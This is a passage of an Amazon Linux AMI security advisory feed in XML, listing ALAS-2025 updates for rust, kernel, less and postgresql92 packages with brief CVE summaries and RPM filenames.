</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24577" title="" id="CVE-2024-24577" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rust-std-static" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-std-static-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-src" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-src-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rust" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-gdb" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-gdb-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rust-analyzer" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-analyzer-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="clippy" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/clippy-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-lldb" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-lldb-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rust-debugger-common" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-debugger-common-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rustfmt" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rustfmt-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-doc" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-doc-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="cargo" version="1.68.2" release="1.66.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/cargo-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-analysis" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-analysis-1.68.2-1.66.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1957</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1957: important priority package update for kernel</title><issued date="2025-01-30 04:16:00" /><updated date="2025-02-05 10:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-50230:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix kernel bug due to missing clearing of checked flag
CVE-2024-50067:
In the Linux kernel, the following vulnerability has been resolved:
uprobe: avoid out-of-bounds memory access of fetching args
CVE-2024-49936:
In the Linux kernel, the following vulnerability has been resolved:
net/xen-netback: prevent UAF in xenvif_flush_hash()
CVE-2024-49884:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix slab-use-after-free in ext4_split_extent_at()
CVE-2024-47742:
In the Linux kernel, the following vulnerability has been resolved:
firmware_loader: Block path traversal
CVE-2024-47701:
In the Linux kernel, the following vulnerability has been resolved:
ext4: avoid OOB when system.data xattr changes underneath the filesystem
CVE-2024-26852:
In the Linux kernel, the following vulnerability has been resolved:
net/ipv6: avoid possible UAF in ip6_route_mpath_notify()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26852" title="" id="CVE-2024-26852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47701" title="" id="CVE-2024-47701" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47742" title="" id="CVE-2024-47742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49884" title="" id="CVE-2024-49884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49936" title="" id="CVE-2024-49936" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50067" title="" id="CVE-2024-50067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50230" title="" id="CVE-2024-50230" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" 
release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-195.582.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1958</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1958: important priority package update for less</title><issued date="2025-01-30 04:16:00" /><updated date="2025-02-05 10:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-32487:
less through 653 allows OS command execution via a newline character in the name of a file, because quoting is mishandled in filename.c. Exploitation typically requires use with attacker-controlled file names, such as the files extracted from an untrusted archive. Exploitation also requires the LESSOPEN environment variable, but this is set by default in many common cases.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32487" title="" id="CVE-2024-32487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="less-debuginfo" version="436" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-debuginfo-436-13.14.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-436-13.14.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/less-436-13.14.amzn1.i686.rpm</filename></package><package name="less-debuginfo" version="436" release="13.14.amzn1" epoch="0" arch="i686"><filename>Packages/less-debuginfo-436-13.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1959</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1959: important priority package update for postgresql92</title><issued date="2025-01-30 04:16:00" /><updated date="2025-02-05 10:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-7348:
Time-of-check Time-of-use (TOCTOU) race condition in pg_dump in PostgreSQL allows an object creator to execute arbitrary SQL functions as the user running pg_dump, which is often a superuser. The attack involves replacing another relation type with a view or foreign table. The attack requires waiting for pg_dump to start, but winning the race condition is trivial if the attacker retains an open transaction. Versions before PostgreSQL 16.4, 15.8, 14.13, 13.16, and 12.20 are affected.
CVE-2023-5869:
While modifying certain SQL array values, missing overflow checks let authenticated database users write arbitrary bytes to a memory area that facilitates arbitrary code execution. Missing overflow checks also let authenticated database users read a wide area of server memory. The CVE-2021-32027 fix covered some attacks of this description, but it missed others.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5869" title="" id="CVE-2023-5869" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7348" title="" id="CVE-2024-7348" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-server-compat" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.70.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.70.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" 
version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.70.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1960</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1960: important priority package update for kernel</title><issued date="2025-02-13 03:06:00" /><updated date="2025-02-18 17:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-50055:
In the Linux kernel, the following vulnerability has been resolved:
driver core: bus: Fix double free in driver API bus_register()
CVE-2024-49860:
In the Linux kernel, the following vulnerability has been resolved:
ACPI: sysfs: validate return type of _STR method
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49860" title="" id="CVE-2024-49860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50055" title="" id="CVE-2024-50055" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="195.591.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-195.591.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.591.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-195.591.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="195.591.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-195.591.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1961</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1961: important priority package update for kernel</title><issued date="2025-02-27 23:43:00" /><updated date="2025-03-06 10:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-56642:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Fix use-after-free of kernel socket in cleanup_bearer().
CVE-2024-56631:
In the Linux kernel, the following vulnerability has been resolved:
scsi: sg: Fix slab-use-after-free read in sg_release()
CVE-2024-50279:
In the Linux kernel, the following vulnerability has been resolved:
dm cache: fix out-of-bounds access to the dirty bitset when resizing
CVE-2024-50143:
In the Linux kernel, the following vulnerability has been resolved:
udf: fix uninit-value use in udf_get_fileshortad
CVE-2024-50035:
In the Linux kernel, the following vulnerability has been resolved:
ppp: fix ppp_async_encode() illegal access
CVE-2024-49995:
In the Linux kernel, the following vulnerability has been resolved:
tipc: guard against string buffer overrun
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49995" title="" id="CVE-2024-49995" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50035" title="" id="CVE-2024-50035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50143" title="" id="CVE-2024-50143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50279" title="" id="CVE-2024-50279" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56631" title="" id="CVE-2024-56631" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56642" title="" id="CVE-2024-56642" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" 
version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-194.598.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="194.598.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-devel-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-194.598.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="194.598.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-194.598.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1962</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1962: important priority package update for kernel</title><issued date="2025-02-27 23:43:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-43882:
In the Linux kernel, the following vulnerability has been resolved:
exec: Fix ToCToU between perm check and set-uid/gid usage
CVE-2024-42285:
In the Linux kernel, the following vulnerability has been resolved:
RDMA/iwcm: Fix a use-after-free related to destroying CM IDs
CVE-2024-42284:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Return non-zero value from tipc_udp_addr2str() on error
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42284" title="" id="CVE-2024-42284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42285" title="" id="CVE-2024-42285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43882" title="" id="CVE-2024-43882" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.353" release="190.569.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.353" release="190.569.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.353-190.569.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.353" release="190.569.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.353-190.569.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.353" 
